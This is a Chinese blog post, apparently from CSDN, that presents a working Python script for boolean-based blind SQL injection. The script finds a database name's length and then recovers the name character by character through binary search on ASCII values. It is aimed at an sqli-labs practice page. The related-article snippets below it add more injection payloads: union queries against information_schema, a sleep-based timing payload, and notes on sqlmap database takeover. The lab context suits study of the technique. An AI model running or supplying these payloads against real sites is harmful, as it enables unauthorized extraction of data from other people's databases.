SQL注入获取数据库名—自动化脚本

最新推荐文章于 2024-10-15 22:08:12 发布
最新推荐文章于 2024-10-15 22:08:12 发布
阅读量2.6k 收藏 3
点赞数
文章标签: sql 自动化 渗透测试 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48968378/article/details/121775414
版权

Python SQL注入 数据库长度 ASCII 二分查找
关键词由CSDN通过智能技术生成

1、搭建好python环境,在脚本目录下新建cmd.bat文件(文件内容:cmd.exe)。

 

2、修改好标志位和payload后,点击cmd.bat进入cmd见面,输入python 文件名运行就OK了。

3、脚本源码:

import requests
import sys
payload=''
url=''
flag='You are in'#标志位——代表请求是否正确
def StartSqli(url):
    DBNameLen=0
    print('[-]开始获取数据库的长度')
    for DBNameLen in range(1,100):
        payload="' and if(length(database())=%d,1,0)--+"%DBNameLen
        targeturl=url % payload
        response=requests.get(targeturl)
        if response.text.find('You are in')!=-1:
            print(targeturl)
            print("[+]数据库长度:%d"%DBNameLen)
            DBName(url,DBNameLen)
            break
def DBName(url,Len):
    payload="' and ascii(substr(database(),%s,1))>%s --+"
    database=''
    print("开始获取数据库名:")
    for i in range(1,Len+1):
        max=122    #z:对应ASCII值
        min=65    #A
        while abs(max-min)>1: 
            mid=int((max+min)/2)
            p=payload % (str(i),str(mid))
            response=requests.get(url % p)
            if flag in response.content.decode("utf-8"): 
                min=mid
            else:
                max=mid
        database=database+chr(max)
        print("[-]The database:%s" % database)  

if __name__ == '__main__':
    url='http://192.168.243.130:8080/Less-8/?id=3%s'
    StartSqli(url)

 

Emxiai
关注
sql注入 mysql数据库字_sql注入 - osc_dfi5j6xi的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39650784的博客
02-22 1508
SQL基础: 注入点的判断:首先判断该注入点是怎么闭合的,常用的是','),')),",再利用and 1=2,and 1=1判断闭合是否正确sql注入常用语句:普通语句:schema_name——数据库table_name——表;column_name——字段;查询数据库:select schema_name from information_schema.schemata--+查询数据库...
sql注入-自动化延时脚本
m0_58853680的博客
01-03 510
这段代码的主要目的是利用SQL注入攻击来获取目标数据库称。它通过发送带有特定payload参数的HTTP GET请求,结合响应时间判断是否存在预期的结果,以此实现盲注攻击。(即用户与密码拼接的查询)。正确修复这个问题后,代码才能正常工作并提取出目标数据库称。需要注意的是,这里的代码实现有一个逻辑问题:在获取数据库时应该使用。(即“select database()”查询)而不是。可根据自己需要去修改payload。
SQL注入
weixin_73331134的博客
04-17 2001
+空格为注释#也为注释MySQL版本8.0以下授权为:GRANT ALL ON以上为:CREATE USER test@“host” IDENTIFIED BY “password” with_native_passwordSHOW DATABASES 列出所有数据库USE mysql;查看某一个数据库里的所有内容 或者是(SHOW TABLES FROM mysql)-----select语句查看当前时间查看当前选择的是哪个数据库查看当前登录数据库的用户查看数据路径。
sql手工注入获取库、表(union联合注入)(个人学习笔记)
最新发布
2401_86737011的博客
10-15 1250
当我们发现一个网站存在sql注入的漏洞时,可以使用sql手工注入来获取信息,如下列的网站sql注入的原理是前端给后端发送指令的时候由于设计者未考虑安全,导致用户可以加上自己的指令进去,从而让服务器完成一些列危险的操作。
sql获取数据库、表、存储过程等信息的方法
Jason's Word
06-30 1707
<br />1.获取所有用户:<br />SELECT name FROM Sysusers where status='2' and islogin='1'<br />islogin='1'表示帐户<br />islogin='0'表示角色<br />status='2'表示用户帐户<br />status='0'表示糸统帐户<br />2.获取所有数据库:<br />SELECT Name FROM Master..SysDatabases ORDER BY Name<br />3.获取所有表<b
SQL获取所有数据库、表、储存过程以及参数列表
11-22 538
1.获取所有用户: SELECT name FROM Sysusers where status='2' and islogin='1' islogin='1'表示帐户 islogin='0'表示角色 status='2'表示用户帐户 status='0'表示糸统帐户 2.获取所有数据库: SELECT Name FROM Master..SysDatabases ORDER B
自动SQL注入数据库接管工具.zip
02-07
5. **数据库接管**:在某些情况下,Sqlmap可以利用SQL注入漏洞接管数据库服务器,例如通过执行自定义的SQL脚本,或者通过获取一个数据库连接的shell。 6. **使用方式**:Sqlmap支持命令行接口,用户可以通过提供URL...
自动SQL注入数据库接管工具___下载.zip
04-19
SQLMap是一款著自动化SQL注入工具,它主要用于检测和利用SQL注入漏洞,并且可以实现对目标数据库的完全控制。在IT安全领域,理解并熟练运用SQLMap对于渗透测试和网站安全评估至关重要。 首先,我们需要理解SQL...
python sql注入检测脚本_sql注入脚本
weixin_36484714的博客
02-09 1263
摘要本篇文章对原理的解释占据主要,输出的美化部分不做详细解释一. 成果展示假设我的数据库有这些那么通过sql注入把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理对sql-labs的前四关有效,其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql注入,而今天的核心就在于三个表达式select * from users where id='-1' uni...
SQL注入之基于布尔的盲注详解
09-10
在实际操作中,由于手动进行布尔型盲注非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
sql注入_表、列字典
05-06
union select * from 表字典 union select 列字典 from 表
SQL获取数据库数据库,表,存储过程等
编程开发资料库
07-27 177
1.获取所有用户: SQL获取所有数据库,&lt;B style='color:white;background-color:#880000'&gt;表&lt;/B&gt;,储存过程以及参数列表 - 0o透气o0 - 让自己变懒...SELECT name FROM Sysusers where status='2' and islogin='1' SQL获取所有数据库,&lt;B s...
SQL获取数据库,表,列,说明等信息
thtml的博客
08-17 1277
/************************************************************************************************************** 1、获取所有用户: islogin='1'   :表示帐户 islogin='0'   :表示角色 status='2'   :表示用户帐户 status='0'
SQL注入python自动化查找当前数据库用户
打代码的小女孩
05-12 1107
# -*- coding: utf-8 -*- import time import requests payloads = 'abcdefghijklmnopqrstuvwxyz@' for i in range(1, 19): for payload in payloads: s = &amp;amp;amp;quot; AND (SELECT * FROM (SELECT (SLEEP (5- ...
sql注入 mysql数据库字_web渗透-SQL注入数据库信息盗取
weixin_33198642的博客
02-22 725
sql注入原理脚本代码接收来自前端数据未进行过滤,导致恶意sql语句插入到数据库中查询执行。如下代码:$id = $_GET['id'];$sql = "select * from user where id=$id";.......$result = mysql_query($sql);?>sql注入攻击流程1.and语法判断是否存在注入点And 1=1正确页面And 1=2错误页面结果:...
【无标题】SQL注入——MYSQL
m0_48222671的博客
04-21 2873
MYSQL注入一、SQL注入产生的条件二、判断注入点三、注入步骤1.猜解列数量2.报错猜解3.查看当前数据库4.查看数据库5.查看数据库6.查询admin列7.查询user中的username 一、SQL注入产生的条件 可控变量 参数带入数据库查询 变量未经过过滤或过滤不严谨 二、判断注入点 下面的方法也知识可能存在,如果有404或者跳转,则没有注入 id=1 and 1=1 页面正常 id=1 and 1=1 页面错误 三、注入步骤 以判断存在注入 1.猜解列数量 id=1 ord
sql注入获取数据库
rnn0921的博客
08-03 2238
程序没有细致过滤用户输入的数据,从而导致非法数据进入系统。SQL注入就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。
sql注入(字符型注入)
2401_82760239的博客
03-30 1263
接下来查看flag表下的字段,用-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#首先用-1' union select 1,group_concat(schema_name) from information_schema.schemata #,列出所有的数据库。(或称为系统架构)是非常重要的。
sql盲注之报错注入(附自动化脚本)
05-22
以下是一个自动化脚本示例,用于检测一个网站是否存在报错注入漏洞: ``` import requests # 构造SQL语句,检测是否存在报错注入漏洞 def test_sqli(url, payload): headers = { "User-Agent": "Mozilla/5.0 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值